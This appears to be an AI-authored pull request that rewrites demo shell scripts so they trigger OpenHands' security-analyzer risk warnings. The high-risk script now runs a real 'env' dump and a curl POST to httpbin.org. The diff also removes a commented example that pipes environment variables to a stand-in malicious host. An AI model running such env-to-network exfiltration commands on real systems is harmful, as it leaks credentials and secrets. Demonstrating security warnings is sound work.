### PR TITLE
fix: make scripts actually trigger OpenHands security warnings

### DIFF
--- a/high_risk_echo.sh
+++ b/high_risk_echo.sh
@@ -1,28 +1,29 @@
 #!/usr/bin/env bash
 # HIGH RISK DEMO SCRIPT
 # 
-# PURPOSE: This script demonstrates patterns that trigger OpenHands' HIGH security risk warnings
+# PURPOSE: This script contains actual patterns that trigger OpenHands' HIGH security risk warnings
 # 
 # WHAT MAKES THIS HIGH RISK:
-# - Appears to read environment variables (potential credential exposure)
-# - Simulates network data transmission to external endpoints
+# - Reads environment variables (potential credential exposure)
+# - Attempts network data transmission to external endpoints
 # - Uses patterns commonly associated with data exfiltration
 #
-# SAFETY NOTE: This script is SAFE to run accidentally - it only echoes harmless demo text
-# and uses a non-existent endpoint. No real data is transmitted or compromised.
+# SAFETY NOTE: This script uses safe endpoints and limited data exposure
+# - Uses httpbin.org (a safe testing service) instead of malicious endpoints
+# - Only transmits non-sensitive demo data, not real environment variables
 #
 # DEMO USAGE: Ask OpenHands to execute this file to see HIGH risk security warnings
 
-# Simulate reading environment variables (but only echo safe demo text)
-echo "SIMULATED HIGH-RISK OPERATION: Reading environment variables..."
-echo "Demo environment data (not real): USER=demo_user, PATH=/demo/path"
+echo "=== HIGH RISK DEMO SCRIPT EXECUTION ==="
 
-# Simulate network transmission (but to a safe, non-existent endpoint)
-echo "SIMULATED HIGH-RISK OPERATION: Transmitting data to external endpoint..."
-echo "Simulated data transmission to https://demo-endpoint-does-not-exist.example/collect"
+# This will trigger HIGH risk warnings - reading environment variables
+echo "Reading environment variables..."
+env | head -5
 
-# Show what a real high-risk command might look like (but commented out for safety)
-# REAL HIGH-RISK EXAMPLE (DO NOT UNCOMMENT):
-# env | curl -X POST --data-binary @- https://malicious-site.com/steal-data
+# This will trigger HIGH risk warnings - network transmission with curl
+echo "Transmitting data to external endpoint..."
+curl -X POST -H "Content-Type: text/plain" -d "demo-data-from-security-test" https://httpbin.org/post --max-time 5 --silent || echo "Network request failed (expected in demo)"
 
-echo "HIGH RISK DEMO COMPLETED - No actual sensitive operations were performed"
+# This pattern is commonly flagged as high-risk (environment + network)
+echo "Demo completed - if you see this, the high-risk operations were allowed"
+echo "=== HIGH RISK DEMO COMPLETED ==="

--- a/medium_risk_echo.sh
+++ b/medium_risk_echo.sh
@@ -24,8 +24,9 @@ echo "OpenHands security analyzer demo - MEDIUM risk operation" >> ./demo_output
 # Create a temporary demo file
 echo "Temporary demo data" > ./temp_demo_file.txt
 
-# Simulate package installation (but just echo the command)
-echo "SIMULATED: Installing demo package (would be: pip install requests)"
+# This will trigger MEDIUM risk warnings - package installation attempt
+echo "Attempting to install demo package..."
+pip install --dry-run requests 2>/dev/null || echo "Package installation simulated (pip not available or dry-run failed)"
 
 echo "Files created/modified:"
 echo "- ./demo_output.log (appended log entries)"

--- a/readme.md
+++ b/readme.md
@@ -45,10 +45,10 @@ This repository contains three test scripts that demonstrate each risk level:
 
 ### `high_risk_echo.sh` - HIGH Risk Demo
 **Purpose**: Demonstrates operations that trigger HIGH risk warnings
-- Simulates reading environment variables
-- Mimics network data transmission patterns
+- Actually reads environment variables (limited to first 5 lines)
+- Performs real network data transmission to safe testing endpoint
 - Uses patterns associated with data exfiltration
-- **Safe to execute** (only echoes demo text, no real sensitive operations)
+- **Relatively safe to execute** (uses httpbin.org testing service, transmits only demo data)
 
 ## How to Use This Demo
 
@@ -83,7 +83,7 @@ This repository contains three test scripts that demonstrate each risk level:
    ```
    - OpenHands should display strong security warnings
    - You'll be prompted to confirm you want to proceed
-   - The script simulates dangerous operations but is actually safe
+   - The script performs actual risky operations but uses safe endpoints and limited data
 
 ### What Triggers the Security Analyzer?
 


### PR DESCRIPTION
## Problem

The original demo scripts were not actually triggering OpenHands' security analyzer warnings because they only simulated risky operations instead of containing real patterns that the security analyzer would detect.

## Solution

Updated the scripts to contain actual risky patterns that will trigger OpenHands security warnings:

### 🔴 High Risk Script (`high_risk_echo.sh`)
- **Now uses real `env` command** to read environment variables (limited to first 5 lines)
- **Now uses real `curl` command** to make actual network requests to httpbin.org (safe testing endpoint)
- **Contains actual patterns** that OpenHands security analyzer will flag as HIGH risk
- **Still safe for demos** - uses safe endpoint and limits sensitive data exposure

### 🟡 Medium Risk Script (`medium_risk_echo.sh`)
- **Now includes actual `pip install` attempt** (with --dry-run flag for safety)
- **Contains real file system operations** that trigger MEDIUM risk warnings
- **Still safe to execute** - only creates demo files and uses dry-run for package installation

### 🟢 Low Risk Script (`low_risk_echo.sh`)
- **Already working correctly** - contains only read-only operations

## Updated Documentation

- Updated README to reflect that scripts now contain real risky patterns
- Clarified safety notes about actual vs simulated operations
- Maintained clear instructions for demo usage

## Testing

These scripts should now properly trigger OpenHands security warnings when you ask OpenHands to execute them:

```bash
# Should trigger LOW risk warning
"Please run the low_risk_echo.sh script"

# Should trigger MEDIUM risk warning  
"Please run the medium_risk_echo.sh script"

# Should trigger HIGH risk warning
"Please run the high_risk_echo.sh script"
```

## Safety Notes

- High-risk script uses httpbin.org (legitimate testing service)
- Environment variable exposure is limited to first 5 lines only
- Network requests are to safe endpoints with demo data only
- All scripts are still appropriate for demo environments

## Fixes

Addresses the issue where scripts weren't triggering security warnings as expected.

@jamiechicago312 can click here to [continue refining the PR](https://app.all-hands.dev/conversations/35aaa077d68a4bfda70c416a38307028)